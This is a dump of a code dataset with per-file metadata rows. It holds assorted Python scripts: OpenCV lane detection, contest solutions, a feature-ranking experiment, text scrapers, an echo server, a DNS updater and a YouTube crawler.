cv.imshow("imgIntpl_visual", imgIntpl_visual)
wind = 7 #количество окон для поиска белой линии
windH = np.int(imgIntpl.shape[0]/wind) #высота окна с учетом их количества и высоты исходного изображения (чтобы сверху до низу были окна)
windSearchWidth = 25 #ширина окна в пикселях
xCentrLeftWind = idLeft #центр первого белого окна как раз совпадает с номером столбца
xCenRightWind = idRight
leftLinePixIndex = np.array([], dtype = np.int16) #создаем пока пустой массив центров линии с типом данных int16, т.к. функции работают с этим типом
rightLinePixIndex = np.array([], dtype = np.int16) #справа по аналогии
# преобразование изображеня в трехканальное (оно всеравно будет ЧБ) но тогда можно будет рисовать цветные окна и линии на этом изображении
#outImg = np.dstack((imgIntpl, imgIntpl, imgIntpl))
# получаем номера (то есть индексы) всех белых пикселей на изоборажении
nonZero = imgIntpl.nonzero() #imgIntpl-изображение, то есть по факту массив, к которому применяем функцию, возвращающая список номеров всех ненулевых элементов массива imgIntpl
#nonZero-в этому списке хранятся индексы по строкам и по столбцам всех ненулевых элементов массива
whitePixY = np.array(nonZero[0]) #выделяем индексы строк белых пикселей уже в массив, а не в список
whitePixX = np.array(nonZero[1]) #выделяем индексы столбцов белых пикселей уже в массив, а не в список
sumX = 0
for i in range(wind): #создаем окна для поиска центра линии в каждом окне
#на каждом проходе for появляется по два окна снизу вверх (дебагом точки можно поставить на функции ректангл)
#координаты углов окон (y координата для левго и правого она одинаковая, а x - меняется)
windY1 = imgIntpl.shape[0] - (i + 1) * windH #верхняя координата от нижнего края изображения вычитаем (номер окна + 1)*на высоту окна
windY2 = imgIntpl.shape[0] - (i) * windH #нижняя координата также только без 1 как раз на одну высоту окна меньше
leftWindX1 = xCentrLeftWind - windSearchWidth #меньшая координта: от центра окна отнимается половина ширины
leftWindX2 = xCentrLeftWind + windSearchWidth #большая координта: к центру окна прибавляется половина ширины
rightWindX1 = xCenRightWind - windSearchWidth
rightWindX2 = xCenRightWind + windSearchWidth
#отрисовываем окна поиска белой линии
cv.rectangle(imgIntpl, (leftWindX1, windY1), (leftWindX2, windY2), 122, 1) # поставить outImg если хотим нарисовать цветные окна поиска cv.rectangle(outImg, (leftWindX1, windY1), (leftWindX2, windY2), (0, 255, 0), 1)
cv.rectangle(imgIntpl, (rightWindX1, windY1), (rightWindX2, windY2), 122, 1)
#cv.imshow("searchWind", imgIntpl) #вернуть outImg если преобразуем в трехканальное для цветной отрисовки окон поиска
#ищем пиксели в каждом окне, принадлежащие разметке
#если координата текущего белого пикселя попдает внутрь диапазона по X и Y
#текущего скользящего окна (сначала левого, потом правого) то сохраним координаты пикселей в массив leftPixInWind
#вконце обязательно указать [0], если этот нулевой индекс не укажем, будет вместо массива кортеж
leftPixInWind = ((whitePixY >= windY1) & (whitePixY <= windY2) & (whitePixX >= leftWindX1) & (whitePixX <= leftWindX2)).nonzero()[0]
rightPixInWind = ((whitePixY >= windY1) & (whitePixY <= windY2) & (whitePixX >= rightWindX1) & (whitePixX <= rightWindX2)).nonzero()[0]
# *** поставить точку дебага и вывести массив номеров (то есть индексов) белых пикселей в окне
#print(leftPixInWind)
leftLinePixIndex = np.concatenate((leftLinePixIndex, leftPixInWind)) #на каждой новой этерации пополняем массив индексов - склейка(как инкрементирование)
rightLinePixIndex = np.concatenate((rightLinePixIndex, rightPixInWind))
#находим среднее значение белой линии чтобы расположить сооответсвенно окно, которое наглядно следит за линией
#смещаем окно, если попало пикселей больше 40
#и если в окно не попадает разметки или попадает меньше 40 то окно не смещается и
#они получаются столбиками. Отчетливо это видно при прорисовки на пунктирной части разметки
if len(leftPixInWind) > 40:
#функция np.mean возвращает значение типа float, чтобы получить значения типа инт, преобразуем: np.int
xCentrLeftWind = np.int(np.mean(whitePixX[leftPixInWind])) #индексы индексов пикселей. напомню, координаты пикселей, попавших в окно хранятся в whitePixX
#***поставить точку для дебага и вывести показания расчитанного центра линии для очередного окна на основе элементов, попавших в окно
#print(xCentrLeftWind) #индексы leftPixInWind, попавшие в мелькое следаящее окошко??
if len(rightPixInWind) > 40:
xCenRightWind = np.int(np.mean(whitePixX[rightPixInWind]))
#print(xCenRightWind)
#ПЕРВЫЙ СПОСОБ НАХОЖДЕНИЯ ЦЕНТРА ДОРОГИ (#рисуем центральну линию относительно найденных центров в каждом скользяцем окне)
x = int((xCenRightWind+xCentrLeftWind)/2) #находим центр дороги по каждому данным середины линии каждого окна поиска
#print(x)
cv.circle(imgIntpl, (x, windY1), 3, 122, -1) # 3-радиус, далее цвет и толщина линии (-1 залить круг)
sumX = sumX + x
# далее можно сложить все показания в массив и устреднить это значение. Тогда в текущем центре будет отражаться не только то что за копотом авто, а как и дальше трасса себя ведет
cv.circle(imgIntpl, (int(sumX/wind), 100), 5, 122, -1)
#перекрас пикселей, оказавшихся внутри скользящих окон (сначала нужно указать строки, затем столбцы)
# outImg[whitePixY[leftLinePixIndex], whitePixX[leftLinePixIndex]] = [0, 255, 0]
# outImg[whitePixY[rightLinePixIndex], whitePixX[rightLinePixIndex]] = [0, 0, 255]
#cv.imshow("Lane", outImg)
#ВТОРОЙ СПОСОБ ПОИСКА ЦЕНТР ДОРОГИ (рисуем параболу окружностью)
# leftx = whitePixX[leftLinePixIndex]
# lefty = whitePixY[leftLinePixIndex]
# rightx = whitePixX[rightLinePixIndex]
# righty = whitePixY[rightLinePixIndex]
#
# left_fit = np.polyfit(lefty, leftx, 2)
# right_fit = np.polyfit(righty, rightx, 2)
# # центр линии лежит между левой и правой линией разметки
# center_fit = ((left_fit+right_fit)/2)
#
# for ver_ind in range(outImg.shape[0]):
# gor_ind = ((center_fit[0]) * (ver_ind ** 2) +
# center_fit[1] * ver_ind +
# center_fit[2])
# cv.circle(outImg, (int(gor_ind), int(ver_ind)), 2, (255, 0, 0), 1)
cv.imshow("CenterLine", imgIntpl) # вернуть outImg, если пребразуем к трехканальному для рисования цветных квадратов
| true |
fff17af49f7c3336e75277b6bec8b665776b8acf | Python | Aasthaengg/IBMdataset | /Python_codes/p02955/s529095346.py | UTF-8 | 1,193 | 2.84375 | 3 | [] | no_license | N, K = map(int, input().split())
A = list(map(int, input().split()))
def divisor(N):
    """Return all positive divisors of N (in no particular order).

    Uses an integer trial loop up to floor(sqrt(N)) instead of
    int(sqrt(N)): the float square root can round down/up for very
    large N and silently drop (or duplicate-check) divisors.
    """
    D = []
    i = 1
    while i * i <= N:  # exact integer bound, no float rounding
        if N % i == 0:
            D.append(i)
            D.append(N // i)
        i += 1
    return list(set(D))
# Each operation adds 1 to one element and subtracts 1 from another, so
# sum(A) is invariant.  For all elements to become divisible by d, d must
# divide sum(A); try divisors of the sum from largest to smallest and
# print the first one reachable with at most K operations.
s = sum(A)
divisors = divisor(s)
divisors.sort(reverse=True)
pride = 0    # total |adjustment| over all elements (2x the operation count)
tention = 0  # running net signed adjustment; must end at 0
TKM = []     # per-element (cost up, negative cost down) pairs
for d in divisors:
    for i, a in enumerate(A):
        l = -(a % d)      # signed cost to round a DOWN to a multiple of d
        h = d - (a % d)   # cost to round a UP to the next multiple of d
        TKM.append((h, l))
    # Sort by the up-cost so the cheapest increments sit at the front and
    # the cheapest decrements (largest up-cost) sit at the back.
    hekinan = sorted(TKM, key=lambda shisho: abs(shisho[0]))
    if abs(hekinan[0][0]) <= abs(hekinan[-1][1]):
        pride += abs(hekinan[0][0])
        tention += hekinan[0][0]
        hekinan = hekinan[1:]
    else:
        pride += abs(hekinan[-1][1])
        tention += hekinan[-1][1]
        hekinan = hekinan[:-1]
    # Greedily alternate: if we are net-positive, take a decrement from the
    # back; otherwise take an increment from the front, keeping balance.
    while len(hekinan) != 0:
        if tention >= 0:
            pride += abs(hekinan[-1][1])
            tention += hekinan[-1][1]
            hekinan = hekinan[:-1]
        else:
            pride += abs(hekinan[0][0])
            tention += hekinan[0][0]
            hekinan = hekinan[1:]
    # Each operation contributes one +1 and one -1, so ops = pride // 2.
    if pride // 2 <= K:
        print(d)
        break
    pride = 0
    tention = 0
    TKM = []
| true |
0f5bf9d436cddfae4fe84d22ffc31e111693e0a6 | Python | Neeraj-kaushik/Geeksforgeeks | /Recursion/N-queen.py | UTF-8 | 809 | 3.203125 | 3 | [] | no_license | def queensafe(li, row, col):
    """Return True if a queen at (row, col) is not attacked from above.

    Only rows above `row` need checking (same column, upper-left and
    upper-right diagonals) because queens are placed top-down.
    """
    # Straight up the same column.
    i = row-1
    j = col
    while i >= 0:
        if li[i][j] == 1:
            return False
        i -= 1
    # Upper-left diagonal.
    k = row-1
    l = col-1
    while k >= 0 and l >= 0:
        if li[k][l] == 1:
            return False
        k -= 1
        l -= 1
    # Upper-right diagonal.
    m = row-1
    n = col+1
    while m >= 0 and n < len(li):
        if li[m][n] == 1:
            return False
        m -= 1
        n += 1
    return True
def queen(li, ans, row):
    """Place queens row by row, printing every complete solution.

    `ans` accumulates the placements as "row-col," tokens; the board
    `li` is mutated in place and restored when backtracking.
    """
    # Base case hoisted out of the column loop: the original tested it
    # inside `for col`, which only worked because it returned on the
    # first iteration.
    if row == len(li):
        print(ans)
        return
    for col in range(len(li)):
        if queensafe(li, row, col):
            li[row][col] = 1
            queen(li, ans + str(row) + "-" + str(col) + ",", row + 1)
            li[row][col] = 0
# Read the board size and solve N-queens on an n x n zero-initialised board.
n = int(input())
li = [[0 for j in range(n)] for i in range(n)]
queen(li, "", 0)
| true |
37a7407568b61b13c4242eb8663f02b3f07addc7 | Python | gianbatayola/FIR-2 | /FIR.py | UTF-8 | 2,338 | 3.1875 | 3 | [] | no_license | # Gian Batayola
# Goal: Rank the importance of features for classification performance to determine which features
# are most impactful
# Two Potential Goals:
# 1. Understanding which features are most impactful for a fixed model
# 2. Selecting features for training a new model
# Steps:
# 1. Make some pseudo data with clear good and bad features
# 2. Train a model with combined good+bad data
# 3. Rank features with amazing method
# 3.1 Permutation based
# 3.2 Gradient based?
# 3.3 Perhaps with correlation stuff
# 4. Determine if ranking matches my expectations
from sklearn.datasets import load_breast_cancer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from FIR_model import Model
from FIR_functions import add_noise
from itertools import combinations
import numpy as np
# ---- Data preparation --------------------------------------------------
dataset = load_breast_cancer()
features = dataset['feature_names']
# Keep only the first 10 ("mean") features; columns 10-29 are the
# error/worst variants, which the noise experiment below does not use.
features = features[:10]
X = dataset['data']
X = np.delete(X, slice(10, 30, 1), 1)

# Standardise features to zero mean / unit variance.
scale = StandardScaler()
scale.fit(X)
X = scale.transform(X)

y = dataset['target']

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=1 / 3, random_state=0)
n_test_samples = len(X_test)

# ---- Noise-corruption ranking experiment -------------------------------
ncr_acc = []
ncr_feats = []
# Every way of choosing 5 of the 10 features to corrupt with noise.
perm = list(combinations([0, 1, 2, 3, 4, 5, 6, 7, 8, 9], 5))

for i in range(len(perm)):
    model = Model(10, 15, 12, n_test_samples)
    # Bug fix: corrupt a FRESH copy of the clean test set each iteration.
    # The original reassigned X_test itself, so noise accumulated across
    # iterations and later permutations were scored on data corrupted by
    # all previous permutations as well.
    X_test_noisy = add_noise(X_test, features, 5, 0, random_state=None, noisy_indices=perm[i])
    acc = model.evaluate(X_train, y_train, X_test_noisy, y_test)
    feats = model.rank(X_test_noisy, y_test, features, 5)
    ncr_acc.append(acc)
    ncr_feats.append(feats)

best_acc = max(ncr_acc)
best_acc_index = ncr_acc.index(best_acc)
print('Best accuracy was', best_acc)
print('Features were', ncr_feats[best_acc_index])
| true |
a9f067b5267d8faae02ea11cae348fc33d2aac0a | Python | demagleb/fast-typing | /dictionaries.py | UTF-8 | 2,837 | 3.03125 | 3 | [
"MIT"
] | permissive | import time
from tkinter import Label
from bs4 import BeautifulSoup
import requests
from PIL import ImageFont
from tkinter.filedialog import askopenfile
def format_text(text: str):
    """Wrap *text* into lines at most 700 px wide in 14 pt Helvetica.

    Em-dashes and guillemets are normalised to ASCII first; empty lines
    are dropped, so the result joins non-blank wrapped lines with '\n'.
    """
    font = ImageFont.truetype("fonts/helvetica.ttf", 14, encoding="unic")
    MAXLEN = 700
    # Normalise typographic punctuation to plain ASCII equivalents.
    text = text.replace('—', '-').replace('«', '"').replace('»', '"')
    wrapped = [[]]   # output lines, each a list of " word" chunks
    width = 0        # rendered pixel width of the line being built
    for source_line in text.splitlines(0):
        for word in source_line.split():
            advance = font.getsize(" " + word)[0]
            if width == 0 or width + advance < MAXLEN:
                wrapped[-1].append(" " + word)
                width += advance
            else:
                # Start a new line; its width excludes the leading space.
                wrapped.append([word])
                width = advance - font.getsize(" ")[0]
        # A source line break always starts a new output line.
        wrapped.append([])
        width = 0
    lines = ["".join(chunks).strip() for chunks in wrapped]
    return "\n".join(filter(lambda s: s, lines))
class FileDictionary:
    """Text source backed by a user-selected local .txt file."""

    def __init__(self) -> None:
        # Bug fix: askopenfile() returns None when the user cancels the
        # dialog, and the original entered `with None:` before its None
        # check could run, raising AttributeError.  Open first, guard,
        # then read inside the context manager.
        chosen = askopenfile(mode="r", filetypes=[("Text file", "*.txt")])
        if chosen is None:
            self.text = ""
        else:
            with chosen:
                self.text = chosen.read(5000)  # cap the sample at 5000 chars

    def get_data(self):
        """Return the file contents wrapped for on-screen display."""
        return format_text(self.text)
class RandomTextEnglishDictionary:
    """Text source that scrapes a random English passage from the web."""

    def __init__(self) -> None:
        page = requests.get("https://randomtextgenerator.com/")
        parsed = BeautifulSoup(page.text, "lxml")
        self.text = parsed.find(id="randomtext_box").text

    def get_data(self):
        """Return the downloaded passage wrapped for on-screen display."""
        return format_text(self.text)
class RandomTextRussianDictionary:
    """Text source scraping three random Russian passages from nocover.ru."""

    def __init__(self) -> None:
        pieces = []
        for _ in range(3):
            session = requests.session()
            main_page = session.get('https://nocover.ru/')
            main_soup = BeautifulSoup(main_page.text, 'lxml')
            # The ids live in the footer download link's
            # onclick="getbook(<bookid>, <passageid>)" attribute.
            onclick = main_soup.find('div', id='footer').find(
                'a', class_="dlink").get('onclick')
            book_id, passage_id = (part.strip()
                                   for part in onclick[9:-1].split(','))
            title_page = session.post('https://nocover.ru/getname/',
                                      data={
                                          'bookid': book_id,
                                          'passageid': passage_id
                                      })
            title = BeautifulSoup(title_page.text, 'lxml').find('div').text
            pieces.append(title + '\n')
            for paragraph in main_soup.find('div', class_='text').find_all('p'):
                pieces.append(paragraph.text + '\n')
        self.text = ''.join(pieces)

    def get_data(self):
        """Return the collected passages wrapped for on-screen display."""
        return format_text(self.text)
# Registry mapping UI display names to the classes that supply practice text.
DICTIONARIES = {
    "Random Text (english)": RandomTextEnglishDictionary,
    "Случайный текст (русский)": RandomTextRussianDictionary,
    "Text from file": FileDictionary
}
| true |
64550529eafbca2e194825fcfcaeee42bb91b6e0 | Python | dehasi/practical-minimum-2020-labs | /lab6/echo_server.py | UTF-8 | 329 | 2.59375 | 3 | [] | no_license |
import socket
HOST = '127.0.0.1'
PORT = 8080
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.bind((HOST, PORT))
socket.listen()
conn, addr = socket.accept()
print('Connected by', addr)
while True:
data = conn.recv(1024)
if not data:
break
conn.sendall(data)
conn.close()
socket.close()
| true |
265340d3e2778e1b0ed880c28c7f669ee1159460 | Python | adrija24/languages_learning | /Python/Day 3/To print list of values from dictionary.py | UTF-8 | 93 | 2.96875 | 3 | [] | no_license | """To print list of values from dictionary"""
# Sample dictionary; its values are printed below.
a={'pp':21, 'qq':23, 'rr':20}
print(a.values()) | true |
d14a05f6c45bab5de90950e3cd5241ab00df4ffa | Python | vlazic/webfactionddns | /webfactionddns/webfactionddns.py | UTF-8 | 1,384 | 2.921875 | 3 | [
"MIT"
] | permissive | """Main module."""
import xmlrpc.client
import requests
import os
class WebfactionDDNS:
    """Minimal dynamic-DNS updater built on the WebFaction XML-RPC API."""

    __my_ip_url = 'http://ip.fs.rs'
    __webfaction_api_url = 'https://api.webfaction.com/'

    def __init__(self, username, password):
        """Log in to the WebFaction API and remember the session id."""
        self.__server = xmlrpc.client.ServerProxy(self.__webfaction_api_url)
        self.__session_id = self.__server.login(username, password)[0]

    def change_my_ip_provider(self, my_ip_url):
        """Switch to a different "what is my IP" service."""
        self.__my_ip_url = my_ip_url

    def update_dns(self, domain_to_check, new_ip=False):
        """Point *domain_to_check* at *new_ip* (auto-detected when falsy)."""
        overrides = self.__server.list_dns_overrides(self.__session_id)
        if not new_ip:
            new_ip = requests.get(self.__my_ip_url).text
        for override in overrides:
            if override['domain'] != domain_to_check:
                continue
            old_ip = override['a_ip']
            if old_ip == new_ip:
                print("IP's are the same")
                return
            return self.change_domain_ip(domain_to_check, old_ip, new_ip)
        print("This domain is not created. You need to create it first")

    def change_domain_ip(self, domain, old_ip, current_ip):
        """Replace the DNS override for *domain* with *current_ip*."""
        self.__server.delete_dns_override(self.__session_id, domain, '')
        self.__server.create_dns_override(
            self.__session_id, domain, current_ip)
        return current_ip
| true |
1b664084f1928ac0af631c0c2a109c5d9e563e01 | Python | shmilyvidian/Python001-class01 | /week03/course_code/p3_thread.py | UTF-8 | 526 | 3.296875 | 3 | [] | no_license | import threading
class MyThread(threading.Thread):
    """Thread subclass demo: stores an id and prints its name when run."""

    def __init__(self, num):
        super().__init__()
        self.num = num  # caller-supplied identifier (not used by run)

    def run(self):
        print(f'name {self.name}')
def f(name):
    """Print a name line; plain-function thread target for comparison."""
    print(f'name {name}')
if __name__ == "__main__":
    # Earlier variant using plain threading.Thread with target=f:
    # t1 = threading.Thread(target=f, args=('t1',))
    # t2 = threading.Thread(target=f, args=('t2',))
    # t1.start()
    # t2.start()
    # t1.join()
    # t2.join()
    t1 = MyThread('t1')
    t2 = MyThread('t2')
    t1.start()
    t2.start()
    # NOTE: no join() here, so 'main' may print before the threads finish.
    print('main')
| true |
597d34f27499e6fbb60a51a3a3a9164c02a12da3 | Python | damianchybki/fake-news-ml | /helpers/splitter.py | UTF-8 | 331 | 2.90625 | 3 | [] | no_license | from sklearn.model_selection import train_test_split
class TrainTestSplitter:
    """Thin wrapper around sklearn's train_test_split with fixed settings."""

    def __init__(self, train_column, test_column):
        # Feature data and matching labels to be split together.
        self.train_column = train_column
        self.test_column = test_column

    def split(self):
        # 80/20 split; random_state=7 keeps the split reproducible.
        return train_test_split(self.train_column, self.test_column, test_size=0.2, random_state=7) | true |
95e20656b9294630351c6931aae0e8d83fc64c74 | Python | brewswain/PCC | /Part I - Basics/Chapter 05 - Dictionaries/Problems/6-8.py | UTF-8 | 638 | 3.46875 | 3 | [] | no_license | # bob = {'species': 'manatee', 'owner': 'big bob'}
# sully = {'species': 'sloth', 'owner': 'patches'}
# darius = {'species': 'kangaroo', 'owner': 'jack'}
# Build the list of pet records from (name, species, owner) triples.
pets = []
for name, species, owner in [
    ('bob', 'manatee', 'big bob'),
    ('sully', 'sloth', 'patches'),
    ('darius', 'kangaroo', 'jack'),
]:
    pets.append({
        'name': name,
        'species': species,
        'owner': owner,
    })

# Print each pet's record in title case.
for pet in pets:
    print("\nThis is " + pet['name'].title() + "'s information:")
    for key, value in pet.items():
        print("\t\t" + key.title() + ': ' + value.title())
| true |
15dfbc83cd9fba817b6acf9dc95f99249976fb03 | Python | onikazu/ProgramingCompetitionPractice | /Atcoder/abc156/d.py | UTF-8 | 942 | 3.5625 | 4 | [] | no_license | q, a, b = map(int, input().split())
n = 10 ** 9  # NOTE(review): appears unused below; q/a/b drive the answer
k = 2 * 10 ** 5  # NOTE(review): appears unused below
mod = 10**9 + 7  # modulus for all arithmetic in this solution
# Fast modular exponentiation: x ** a (mod `mod`) in O(log a) time.
def power(x, a):
    """Return x**a modulo the global `mod` via recursive squaring."""
    if a == 0:
        return 1
    if a == 1:
        return x
    half = power(x, a // 2)
    if a % 2 == 0:
        return half ** 2 % mod
    return half ** 2 * x % mod
# Modular inverse via Fermat's little theorem: x**(mod-2) == x**-1 (mod mod),
# computed in O(log mod) time.
# https://qiita.com/Yaruki00/items/fd1fc269ff7fe40d09a6
def modinv(x):
    """Return the multiplicative inverse of x modulo the global `mod`."""
    return power(x, mod - 2)
def binomial_coefficients(n, k):
    """Return C(n, k) modulo the global `mod`."""
    numerator = 1
    denominator = 1
    for i in range(k):
        numerator = numerator * (n - i) % mod
        denominator = denominator * (i + 1) % mod
    return numerator * modinv(denominator) % mod
# ABC156 D "Bouquet": non-empty selections of q flowers whose size is
# neither a nor b: (2**q - 1 - C(q, a) - C(q, b)) mod 1e9+7, rearranged
# so every intermediate stays non-negative.
print(((((power(2, q) - binomial_coefficients(q, a)) % mod) - binomial_coefficients(q, b)) % mod - 1) % mod)
| true |
a106cda05535c33fb67eed730454f2d63a69c23b | Python | voidism/HsinChu | /emerg/fireDep.py | UTF-8 | 1,782 | 2.9375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
import os, csv, json, codecs, re
def WGS84FromTWD67TM2(x, y):
    """Convert TWD67 TM2 coordinates to WGS84 lat/lng.

    Returns {'status': bool} plus 'lat'/'lng' on success.  The
    TWD97 -> WGS84 step shells out to the external `proj` utility, so
    'status' stays False if `proj` is unavailable or returns no numbers.
    """
    out = {'status': False}
    lat = None
    lon = None
    # TWD67 -> TWD97: approximate linear datum shift.  Bug fix: both
    # formulas must use the ORIGINAL coordinates; the previous version
    # reused the already-shifted x when computing y, skewing the result.
    A = 0.00001549
    B = 0.000006521
    x67 = float(x)
    y67 = float(y)
    x = x67 + 807.8 + A * x67 + B * y67
    y = y67 - 248.6 + A * y67 + B * x67
    # TWD97 -> WGS84 via `proj`; -f "%.8f" yields plain decimal lat/lng,
    # so no degree-minute-second conversion is needed afterwards.
    result = os.popen('echo ' + str(x) + ' ' + str(y) + ' | proj -I +proj=tmerc +ellps=GRS80 +lon_0=121 +x_0=250000 +k=0.9999 -f "%.8f"').read().strip()
    process = re.compile(r'([0-9]+\.[0-9]+)', re.DOTALL)
    # proj prints longitude then latitude for this inverse projection.
    for item in process.findall(result):
        if lon is None:
            lon = float(item)
        elif lat is None:
            lat = float(item)
        else:
            break
    if lat is None or lon is None:
        return out
    out['lat'] = lat
    out['lng'] = lon
    out['status'] = True
    return out
# Load the fire-department records, attach WGS84 coordinates, and write
# the augmented data back out.  Fixes: the input file was never closed
# and was bound to the name `file`.
with codecs.open('fireDep.json', 'r', 'utf-8-sig') as src:
    data = json.loads(src.read())
for i in data:
    gps = WGS84FromTWD67TM2(i["GPS TWD67 X座標"], i["GPS TWD67 Y座標"])
    if gps['status']:
        i['lat'] = str(gps['lat'])
        i['lng'] = str(gps['lng'])
    else:
        print("fail!")
with open('fireDep2.json', 'w') as file1:
    json.dump(data, file1)  # redundant explicit close removed; `with` handles it
5d452164521e36be8fa8ce4f84aa9feab9a08552 | Python | GassaFM/contests | /facebook/fbhc2018-r1/dgen.py | UTF-8 | 489 | 2.609375 | 3 | [] | no_license | import random
# Test-data generator (Facebook Hacker Cup 2018 R1).  NOTE: Python 2
# syntax (`print` statements) — not runnable under Python 3.
random.seed (26932486)
t = 75
print t
for i in range (t):
	# NOTE(review): a/b look like per-edge value pairs normalised to
	# (low, high); y/h look like a shuffled node order with weights —
	# confirm against the problem statement.
	n = 3000
	a = [random.randrange (1, 1000000) for i in range (n - 1)]
	b = [random.randrange (1, 1000000) for i in range (n - 1)]
	for k in range (n - 1):
		a[k], b[k] = min (a[k], b[k]), max (a[k], b[k])
	m = 3000
	y = list (range (1, n + 1))
	random.shuffle (y)
	h = [random.randrange (1, 1000000) for i in range (n)]
	print n, m
	for k in range (n - 1):
		print a[k], b[k]
	for j in range (m):
		print y[j], h[j]
| true |
bb52d847c5c51c22e7a80170291e39ba17e43595 | Python | daniel-reich/ubiquitous-fiesta | /i5kcGmT7gFKkf3mTi_8.py | UTF-8 | 289 | 2.984375 | 3 | [] | no_license |
def data_type(value):
    """Name *value*'s exact type; anything unrecognised is 'date'.

    Exact-type matching is deliberate: bool (a subclass of int) does NOT
    count as 'integer', matching the original chained comparisons.
    """
    labels = {
        list: 'list',
        dict: 'dictionary',
        str: 'string',
        int: 'integer',
        float: 'float',
    }
    return labels.get(type(value), 'date')
| true |
651ab449eb5b443f5e060db4a5974c50f44071c8 | Python | eeshan9815/EmotionRecogniton | /VisCom/real-time_emotion_analyzer/still-image.py | UTF-8 | 2,491 | 2.84375 | 3 | [] | no_license | import cv2
import sys
import json
import time
import numpy as np
from keras.models import model_from_json
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
def predict_emotion(face_image_gray, model):
    """Score one cropped grayscale face with the CNN.

    Returns six probabilities in the order
    [angry, fear, happy, sad, surprise, neutral].
    """
    face48 = cv2.resize(face_image_gray, (48, 48), interpolation=cv2.INTER_AREA)
    # The model expects a single-sample, single-channel 48x48 batch.
    batch = face48.reshape(1, 1, 48, 48)
    predictions = model.predict(batch, batch_size=1, verbose=1)
    flat = [prob for row in predictions for prob in row]
    angry, fear, happy, sad, surprise, neutral = flat
    return [angry, fear, happy, sad, surprise, neutral]
def still_image(path):
    """Detect faces in the image at *path* and plot emotion scores per face.

    Side effects: shows OpenCV/matplotlib windows and appends raw scores
    to emotion.txt.  Expects model.json, model.h5 and the Haar cascade
    XML in the current working directory.
    """
    emotion_labels = ['angry', 'fear', 'happy', 'sad', 'surprise', 'neutral']
    cascPath = 'haarcascade_frontalface_default.xml'
    faceCascade = cv2.CascadeClassifier(cascPath)
    # load json and create model arch
    json_file = open('model.json','r')
    loaded_model_json = json_file.read()
    json_file.close()
    model = model_from_json(loaded_model_json)
    # load weights into new model
    model.load_weights('model.h5')
    # Read the still image and show the unannotated original.
    frame = cv2.imread(path)
    cv2.imshow('Image1',frame)
    img_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY,1)
    # NOTE(review): cv2.cv.CV_HAAR_SCALE_IMAGE is the OpenCV 2 API —
    # confirm the installed OpenCV version supports it.
    faces = faceCascade.detectMultiScale(
        img_gray,
        scaleFactor=1.1,
        minNeighbors=5,
        minSize=(30, 30),
        flags=cv2.cv.CV_HAAR_SCALE_IMAGE
    )
    emotions = []
    # Draw a rectangle around the faces and score each crop.
    for (x, y, w, h) in faces:
        # fig, ax = plt.subplots()
        face_image_gray = img_gray[y:y+h, x:x+w]
        cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
        plt.imshow(frame)
        plt.show()
        angry, fear, happy, sad, surprise, neutral = predict_emotion(face_image_gray, model)
        # Log the raw scores with a timestamp for later analysis.
        with open('emotion.txt', 'a') as f:
            f.write('{},{},{},{},{},{},{}\n'.format(time.time(), angry, fear, happy, sad, surprise, neutral))
        # ('{},{},{},{},{},{},{}\n'.format(time.time(), angry, fear, happy, sad, surprise, neutral))
        s = 'angry {}, fear {}, happy {}, sad {}, surprise {}, neutral {}\n'.format(angry, fear, happy, sad, surprise, neutral)
        # Bar chart of the six emotion scores for this face.
        a = plt.bar(emotion_labels, [angry, fear, happy, sad, surprise, neutral],align = 'center',color = ['r','#800080','y','b','#ffa500','#9acd32'])
        plt.show()
    # Display the resulting frame
    cv2.imshow('Image', frame)
# Script entry point: analyse the bundled sample image.
if __name__ == '__main__':
    still_image('sample.jpg') | true |
d1f84d3f983a27d19f474d4669c972dcfd6b4991 | Python | SLKyrim/vscode-leetcode | /0441.排列硬币.py | UTF-8 | 1,069 | 3.359375 | 3 | [] | no_license | #
# @lc app=leetcode.cn id=441 lang=python3
#
# [441] 排列硬币
#
# https://leetcode-cn.com/problems/arranging-coins/description/
#
# algorithms
# Easy (39.69%)
# Likes: 48
# Dislikes: 0
# Total Accepted: 16.1K
# Total Submissions: 40.1K
# Testcase Example: '5'
#
# 你总共有 n 枚硬币,你需要将它们摆成一个阶梯形状,第 k 行就必须正好有 k 枚硬币。
#
# 给定一个数字 n,找出可形成完整阶梯行的总行数。
#
# n 是一个非负整数,并且在32位有符号整型的范围内。
#
# 示例 1:
#
#
# n = 5
#
# 硬币可排列成以下几行:
# ¤
# ¤ ¤
# ¤ ¤
#
# 因为第三行不完整,所以返回2.
#
#
# 示例 2:
#
#
# n = 8
#
# 硬币可排列成以下几行:
# ¤
# ¤ ¤
# ¤ ¤ ¤
# ¤ ¤
#
# 因为第四行不完整,所以返回3.
#
#
#
# @lc code=start
class Solution:
    def arrangeCoins(self, n: int) -> int:
        """Return the number of complete staircase rows: max k with
        k*(k+1)/2 <= n (arithmetic-series sum).

        The closed form (sqrt(8n+1)-1)/2 relies on float sqrt; here the
        float value is only an initial estimate and integer correction
        loops make the answer exact for any 32-bit n.
        """
        k = int((2 * n) ** 0.5)  # float estimate of the answer
        while k * (k + 1) // 2 > n:  # correct any upward rounding
            k -= 1
        while (k + 1) * (k + 2) // 2 <= n:  # correct any downward rounding
            k += 1
        return k
# @lc code=end
| true |
49a422de52ded0b4d7ffc37cc89e9962cae55b96 | Python | nickhsu/youtube-crawler | /client/client_fetch_id.py | UTF-8 | 1,926 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env python3
import sys
import httplib2
import time
import json
import urllib
SERVER_URL = 'http://gaisq.cs.ccu.edu.tw:4567'
class YoutubeRelatedFetcher:
    """Fetches "related video" ids from the (legacy) YouTube GData API."""
    def __init__(self):
        # Reused HTTP connection; rebuilt on any request failure.
        self.conn = httplib2.Http()
    def get_related_id(self, vid):
        """Return up to 50 related video ids for *vid*.

        Returns False on a non-200 response; raises IOError when the
        body mentions "too_many_recent_calls" (server rate limit / ban).
        NOTE(review): the bare-except loop retries forever on any
        network error, rebuilding the connection each time.
        """
        while True:
            try:
                res, content = self.conn.request("http://gdata.youtube.com/feeds/api/videos/" + vid + "/related?max-results=50&fields=entry(id)&alt=json")
                content = content.decode('utf-8')
                break
            except:
                self.conn = httplib2.Http()
        if res.status != 200:
            if content.find("too_many_recent_calls") != -1:
                #ban by server or no video
                raise IOError
            else:
                return False
        else:
            data = json.loads(content)
